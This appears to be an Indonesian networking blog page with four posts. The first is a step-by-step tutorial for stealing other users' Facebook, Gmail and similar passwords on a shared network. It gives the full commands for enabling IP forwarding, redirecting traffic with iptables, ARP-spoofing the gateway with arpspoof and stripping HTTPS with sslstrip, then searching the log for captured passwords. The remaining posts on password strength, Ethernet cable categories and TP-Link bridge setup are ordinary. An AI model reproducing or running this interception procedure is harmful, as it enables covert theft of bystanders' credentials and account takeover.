Hacking Facebook Menggunakan Linux Backtrack

Posted by Unknown Jumat, 18 Maret 2016 0 komentar
Hacking Facebook Menggunakan Linux Backtrack
                  Disini saya akan membahas cara mencuri password, tidak hanya password facebook tetapi semua. tapi disini untuk melakukaannya kita harus menggunakan system operasi LINUX dari turunan debian bisa UBUNTU, BACKTRACK, BLANKON dan lainnya.
Cara ini pada dasarnya adalah menyadap atau menunggu di pintu utama dimana jaringan akan melewatinya. disitu kita aka menyaring semua akses ke internet dengan menuggu di GATEWAY jaringan kita yang kita gunakan
Nhaa, Sekarang kita mulai tutorialnya
Pertama-tama siapkan tool yang akan kita gunakan
  • Arpspoof
  • Sslstrip-0.9
  • OS Linux 32 Bit
Setelah semua tool yang di butuhkan sudah tersedia lakukan langkah berikut (jika paket belum terinstal) :
1) Buka Terminal kemudian ketikkan : wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

2) Kemudian extract file dengan cara : tar zxvf sslstrip-0.9.tar.gz

3) Ok sekarang kita masuk ke dalam folder baru dari file yang telah kita extract tadi : cd sslstrip-0.9 
4) Dan untuk menginstal ketikkan : python setup.py install 
 

Lakukan langkah berikut ( Jika paket sudah terinstall )
Gunakan cara ini setiap kali jika ingin mencuri password lagi

1) 
Pertama hidupkan terlebih dahulu port untuk memforward : echo ’1′ > /proc/sys/net/ipv4/ip_forward 

2) Kemudian cari gateway atau pintu dari jaringan yang akan kita sadap dengan cara : netstat -nr 

3) sekarang kita reset port http ke port 8080, ketikan : iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 

4) Mulai menyadap dengn cara : arpspoof -i wlan0 192.168.0.1 ( 192.168.0.1 adalah gateway dari jaringan yang saya gunakan, gantilah gateway tersebut dengan gateway yang anda temukan dari netstat -nr tadi) 

5) Kemudian buka terminal baru lalu ketikkan  : sslstrip -l 8080 untuk mengaktifkan cookies yang akan kita baca 

6) Set up is complete!! Ok sekarang kita telah menyadap akses jaringan yang melewati gateway.
7) jika anda ingin melihat akses kemana sajakah itu gunakan perintah : tail -f sslstrip.log

8) dan saat ada seseorang melakuakn login entah facebook yahoo gmail atau apapun yang menggunakan username dan password WALAAA kita akan mengetahuinya.
 
karena akan memakan waktu yang cukup lama karena harus menunggu ada seseorang yang mlakukan login jadi kita harus bersabar. dan itupun akan muncul script yang cukup banyak. gunakan perintah find "pass: tanpa petik agar kita lebih mudah menemukannya

HANYA UNTUK PENGETAHUAN, JANGAN DI SALAH GUNAKAN

Baca Selengkapnya ....

Membuat Password yang Handal

Posted by Unknown 0 komentar
Membuat Password yang Handal
     Password yang kita pasang haruslah password yang handal. Agar tidak mudah untuk dijebol. Ada beberapa kriteria agar password yang kita buat termasuk dalam kategori handal.
Sebuah password yang handal haruslah password yang sulit ditebak, baik oleh manusia atau pun oleh mesin (program). Selain itu password tersebut harus juga mudah diingat oleh yang mempunyai password. Inilah dua hal yang harus Anda cari perimbangannya. Karena bila kita membuat password sekedarnya yang mudah diingat tentu password tersebut akan mudah ditembus. Misalnya saja sebuah password yang berupa nama belakang seseorang yang kita cintai. Password seperti itu akan sangat mudah ditebak. Sebaliknya bila password tersebut sangat sulit, maka kita agak sedikit kerepotan untuk mengingatnya, contohnya adalah password yang berupa susunan huruf dan karakter-karakter yang tidak membentuk kata. Semisal: “kth23$@”.
Password merupakan deretan karakter-karakter. Biasanya kebanyakan orang membuat password hanya merupakan deretan karakter angka saja atau alfabet saja. Password yang seperti ini tentu akan mudah ditembus dengan menggunakan program bantu. Untuk itu perlu dibuat sebuah password yang benar-benar handal.
Sebuah password yang handal, haruslah mempunyai kelengkapan dari beragam karakter yang dapat digunakan untuk password. Ragam karakter tersebut adalah alfabet huruf besar, alfabet huruf kecil, angka, dan juga karakter khususnya. Huruf besar, huruf kecil, dan angka telah kita pahami. Untuk karakter khususnya adalah karakter-karakter di luar alfabet dan angka, contohnya adalah: “, @, #, $, %, dll. Keempat ragam karakter tersebut (huruf besar, huruf kecil, angka, dan karakter khusus), kalau dimuat dalam satu password akan menjadikan password kita sangat handal dan sulit untuk dibobol.

Mengapa Demikian?
Mengapa sebuah password yang handal harus memuat 4 ragam karakter sebagai mana telah disebutkan di atas. Yaitu:
·         Memuat huruf kapital, seperti: A, B, C, D, E,….
·         Memuat huruf kecil, seperti: a, b, c, d, e, … .
·         Memuat angka, seperti: 1, 2, 3, 4, 5, 6, … .

·         Memuat karakter khusus, seperti: ~, @, #, %,!, … .
Mengapa demikian? Untuk menjelaskan hal ini berarti kita harus memahami cara kerja sebuah program pembongkar password. Saya coba jelaskan konsep program pembongkar password yang sederhana.


Gambar Sebuah kotak login dengan Username dan Password
Semisal ada sebuah kotak login yang meminta isian username dan password. Sebuah program pembongkar password akan melakukan percobaan untuk mengetest satu per satu karakter yang diduga sebuah password. Semisal seorang user mempunyai password hanya alfabet seperti ‘kudanil’. Program pembongkar password cukup untuk melakukan uji coba terhadap rentang karakter yang membentang dari ‘a’ sampai ‘z’. Dengan demikian karakter yang diujicoba adalah hanya sebanyak 26 karakter.
Kemudian, seandainya seorang user mempunyai password ‘kud4n1l’, maka bentangan karakter yang diujicoba akan semakin banyak. Yaitu meliputi karakter alfabet sejumlah 26 karakter ditambah karakter angka dari ‘0’ sampai ‘9’ sejumlah 10 karakter. Dengan demikian sebuah program pembongkar password harus melakukan uji coba terhadap karakter yang lebih banyak yaitu sejumlah 36 karakter. Ini artinya adalah diperlukan waktu lebih lama untuk membongkar password yang memuat karakter alfabet dan angka. Lebih lama ketimbang membongkar password yang hanya memuat alfabet saja.
Selanjutnya, bila seandainya seorang user mempunyai password ‘kuD4niL’, maka bentangan karakter yang perlu diujicoba akan semakin banyak. Mari kita hitung. Karakter yang diujicoba adalah karakter alfabet huruf kecil yaitu ‘a’, sampai ‘z’ sejumlah 26 karakter. Kemudian yang perlu diujicoba lagi adalah karakter huruf kapital yaitu ‘A’, sampai ‘Z’ sejumlah 26 karakter lagi. Ditambah dengan karakter angka dari ‘0’ sampai ‘9’ sejumlah 10. Dengan demikian karakter yang perlu diujicoba adalah 26 + 26 + 10 sebanyak 62. Ini tentunya akan membutuhkan waktu lebih lama lagi bagi sebuah program pembongkar password untuk melakukan ‘ujicoba’ (baca: membongkar) password seperti ini ketimbang password sebelumnya di atas.
Nah, demikian pula logikanya bila seorang user mempunyai password ‘kuD4n!L’ yang merupakan kombinasi dari karakter huruf kecil, huruf besar, angka dan karakter khusus. Tinggal Anda hitung sendiri jumlah karakter khusus yang ada pada sebuah komputer. Ini menyebabkan program pembongkar password membutuhkan waktu jauh lebih lama lagi ketimbang membongkar password seperti yang dicontohkan sebelumnya.



Baca Selengkapnya ....

jenis kabel ethernet Cat5, Cat-5e Cat6, Cat -6a dengan fungsi kegunaan dan perbedaan

Posted by Unknown Sabtu, 12 Maret 2016 0 komentar
Jenis-jenis kabel Ethernet, Cat5, Cat-5e, Cat6, Cat-6a beserta fungsi dan perbedaannya

Apakah anda berencana untuk memasang sebuah jaringan ditempat anda? Sudahkah anda tau perangkat apa saja yang dibutuhkan? Apakah perangkat yang anda pilih sudah benar? Sebelum anda menentukan pilihan sebaiknya kenali dulu apa fungsi dan kegunaan, salah satu perangkat yang dibutuhkan untuk memasang sebuah jaringan adalah kabel ethernet yang fungsinya untuk jalur lalu lintas data nantinya.

Tidak semua kabel Ethernet diciptakan sama, apa bedanya dan bagaimana Anda tahu mana yang harus Anda gunakan? Mari kita lihat perbedaan teknis dan fisik kategori kabel Ethernet agar anda dapat memilih yang benar.

Kabel ethernet dikelompokkan menjadi kategori yang berurutan ("CAT") berdasarkan spesifikasi yang berbeda. Kadang-kadang kategori diperbarui lagi dengan klarifikasi atau pengujian standar yang lebih lanjut (misalnya 5e, 6a). Kategori-kategori ini di ciptakan agar kita dapat dengan mudah mengetahui apa jenis kabel yang kita butuhkan untuk sebuah aplikasi tertentu. Produsen diwajibkan untuk mematuhi standar yang ada untuk memudahkan konsumen.

Apa perbedaan antar kategori dan bagaimana Anda bisa tahu kapan harus menggunakan kabel yang tanpa pelindung, terlindungi, terbuka atau kabel padat. Terus membaca artikel ini agar anda mendapat gambaran sebelum memilih.

Perbedaan teknis

Perbedaan spesifikasi kabel ini tidak akan mudah dilihat secara fisik, jadi mari kita lihat apa fungsi masing-masing kategori. Di bawah ini adalah grafik untuk referensi ketika memilih kabel untuk aplikasi Anda berdasarkan standar untuk kategori tersebut.


Karena jumlah kategori semakin banyak, begitu juga kecepatan dan Mhz kawat. Ini bukan suatu kebetulan, karena setiap kategori telah dilakukan pengujian lebih ketat untuk menghilangkan crosstalk (XT) dan menambahkan isolasi antara kabel.

Semua percobaan yang sudah dilakukan kadang tidak selalu sama.Secara fisik Anda dapat menggunakan kabel Cat-5 untuk kecepatan 1 Gb, dan saya pribadi menggunakan kabel yang lebih panjang dari 100 meter, tetapi karena standarnya belum diuji untuk itu, Anda mungkin akan mendapatkan hasil yang berbeda. Hanya karena Anda memiliki kabel Cat-6, tidak berarti Anda memiliki kecepatan 1 Gb dan jaringan anda bagus. Setiap koneksi dalam jaringan Anda harus mendukung kecepatan 1 Gb.

Kategori kabel 5 direvisi, dan sebagian besar diganti, kategori 5 Ditingkatkan menjadi kabel Cat-5e yang secara kasat mata tidak berubah secara fisik di dalam kabel, melainkan diterapkan standar pengujian yang lebih ketat untuk crosstalk.

Kategori 6 direvisi dengan Kategori Cat-6a yang telah dilakukan pengujian untuk komunikasi 500 Mhz (dibandingkan dengan Cat-6 250 Mhz). Semakin tinggi frekuensi komunikasi maka akan menghilangkan crosstalk asing (AXT).

Perbedaan fisik

Jadi bagaimana cara kabel fisik menghilangkan gangguan dan memungkinkan untuk meningkatkan kecepatan lebih cepat? tanpa melalui kawat memutar dan isolasi. Kabel memutar diciptakan oleh Alexander Graham Bell pada tahun 1881 untuk digunakan pada kabel telepon yang membentang di sepanjang sisi saluran listrik. Ia menemukan bahwa dengan memutar kabel setiap 3-4 tiang listrik, hal itu dapat mengurangi gangguan dan meningkatkan jangkauan. Twisted pair menjadi dasar untuk semua kabel Ethernet untuk menghilangkan interferensi antara kabel internal yang (XT), dan kabel eksternal (AXT).


Ada dua perbedaan fisik utama antara Cat-5 dan Cat-6 kabel, jumlah tikungan per cm kawat, dan ketebalan selubung.


Panjang kabel memutar yang tidak standar, tetapi biasanya ada 1,5-2 tikungan per cm di Cat-5 (e) dan 2 + tikungan per cm di Cat-6. Dalam satu kabel, masing-masing pasangan berwarna juga akan memiliki panjang twist yang berbeda berdasarkan bilangan prima sehingga tidak ada dua tikungan yang pernah menyelaraskan. Jumlah tikungan per pasang biasanya berbeda untuk setiap produsen kabel. Seperti yang Anda lihat pada gambar di atas, ada dua pasang yang memiliki jumlah yang sama dari tikungan per inci.

Banyak kabel Cat-6 juga termasuk spline nilon yang membantu menghilangkan crosstalk. Kabel Cat-6, spline tidak diperlukan selama tes kabel sesuai dengan standar. Pada gambar di atas, kabel Cat-5e adalah satu-satunya yang menggunakan spline.

Sementara spline nilon membantu mengurangi crosstalk di kawat, selubung tebal melindungi terhadap short end crosstalk (NEXT) dan crosstalk asing (AXT) yang keduanya lebih sering terjadi sebagai frekuensi (Mhz) yang meningkat. Dalam gambar ini kabel Cat-5e memiliki selubung tipis, tetapi juga merupakan satu-satunya yang menggunakan spline nilon.


Shielded (STP) vs Unshielded (UTP)

Karena semua kabel Ethernet dibuat memutar, manufaktur menggunakan perisai untuk lebih melindungi kabel dari interferensi. Unshielded twisted pair dapat dengan mudah digunakan untuk kabel antara komputer dan dinding, tetapi Anda akan membutuhkan kabel terlindung untuk daerah dengan gangguan tinggi dan kabel yang sipasang di luar ruangan atau di dalam dinding.

Ada berbagai cara untuk melindungi kabel Ethernet, tetapi biasanya melibatkan menempatkan perisai di sekitar masing-masing pasangan kawat dalam kabel. Hal Ini melindungi pasangan dari crosstalk internal. Membuat pelindung lebih tidak hanya dapat melindungi kabel dari crosstalk asing tetapi juga skrining kabel UTP atau STP, Secara teknis gambar di atas menunjukkan kabel filter STP (S / STP).


Kabel padat vs kabel terurai

Kabel Ethernet padat(solid) dan terurai mengacu pada konduktor tembaga yang sebenarnya di pasang. Kabel yang solid menggunakan satu bagian dari tembaga untuk konduktor listrik sementara yang terurai menggunakan serangkaian kabel tembaga memutar bersama-sama. Ada banyak aplikasi yang berbeda untuk setiap jenis konduktor, tetapi ada dua aplikasi utama untuk setiap jenis, Anda harus tahu tentang itu.

Kabel terurai lebih fleksibel dan harus digunakan di meja atau di mana Anda dapat bergerak dengan kabel di sekitar anda.
Kabel yang solid tidak fleksibel tetapi juga lebih tahan lama yang membuatnya ideal untuk instalasi permanen serta dinding luar dan dalam.
Sekarang Anda tahu jenis kabel yang harus Anda gunakan.

Baca Selengkapnya ....

CARA KONFIGURASI SETTING BRIDGE TP LINK WA7210N DENGAN AP MODE

Posted by Unknown 0 komentar
CARA KONFIGURASI SETTING BRIDGE TP LINK WA7210N DENGAN AP MODE

Definisi:

Di dalam sebuah jaringan, pada konfigurasi Bridge Tradisional memungkinkan dua atau lebih titik akses nirkabel (AP) untuk berkomunikasi antara satu sama lain dengan tujuan bergabung dengan beberapa sambungan LAN, silahkan perhatikan gambar dibawah.


Bridge dengan mode AP juga dapat menyediakan koneksi nirkabel lokal seperti yang ditunjukkan pada gambar di bawah ini, penjelasannya yaitu AP 1 sebagai pusat koneksi, AP 2 nembak AP 1 untuk mendapatkan koneksi, setelah berhasil terhubung dengan AP 1 selanjutnya AP 2 membagi koneksi ke client baik melalui LAN atau Wireless.



Prasyaratan:

1.     AP1 sudah dikonfigurasi sebagai mode titik akses (access point).
2.     Buat dan settinglah IP address, security type, wireless pasword, region dan chanel pada AP1

Jika langkah diatas sudah dilakukan, maka selanjutnya kita lakukan konfigurasi perangkat.

Konfigurasi perangkat
 Langkah 1
  • Hubungkan komputer anda ke AP2 menggunakan kabel LAN. Konfigurasi IP komputer anda dengan IP statis (di sini saya menggunakan 192.168.0.100 sebagai contoh) untuk komputer. 
  • Login ke Interface berbasis Web dengan memasukkan IP default alamat 192.168.0.254 ke address bar browser web Anda. 
  • Masukkan Username dan password default admin. Pilih "Saya setuju dengan syarat penggunaan ini" dan klik login.
 Langkah 2
  • Pastikan dan settinglah IP LAN AP1 dan AP2 pada class/segmen yang sama
  • Setelah mengubah alamat IP dari AP2, Anda perlu kembali login dengan menggunakan IP address,jika alamat IP telah diubah ke subnet yang berbeda Anda perlu mengubah alamat IP pada komputer Anda untuk menyesuaikan.

 Langkah 3
Mengkonfigurasi AP2 ke Bridge dengan modeAP.

  1. Klik pada Mode Operasi di sisi kiri halaman setting. PilihBridge dengan AP dan klik Save untuk menyimpan settingan

2.  Silahkan pilih dan klik Wireless -> Wireless Setting pada menu sebelah kiri, maka akan tampak        seperti gambar dibawah..

Silahkan pilih dan klik Wireless -> Wireless Setting pada menu sebelah kiri, maka akan tampak seperti gambar dibawah.


3. Klik tombol Survey dan daftar AP akan ditampilkan. Cari nama jaringan nirkabel (SSID) dari AP1 dan klik Connect.



4.  Pada Wireles bridge setting pastikan Key Type, Password, Region dan Chanel harus sama dengan AP1, sedangkan Nama Wireless untuk penyebar dapat berbeda dari AP1.Setelah semua data diisi selanjutnya klik tombol Save.
silahkan lihat gambar dibawah ini dan perhatikan bagian mana saja yang harus diisi.





5.   Setelah settingan diatas selesai selanjutnya pilih Wireless - Wireless Security untuk mengkonfigurasi password nirkabel jaringan nirkabel local Anda Disarankan untuk menggunakan WPA / WPA2-Personal.untuk Password dapat berbeda dengan password AP1.



6.     Setelah settingan password selesai langkah berikutnya adalah klik System Tools - Reboot untuk reboot perangkat anda, hal ini dilakukan juga agar settingan anda aktif di perangkat.

Setelah reboot(restart) silahkan tes koneksi dan cek semua perangkat untuk memastikan konfigurasi anda tidak ada kesalahan dan dapat segera digunakan.

Baca Selengkapnya ....
Buat Email | Copyright of Jaringan.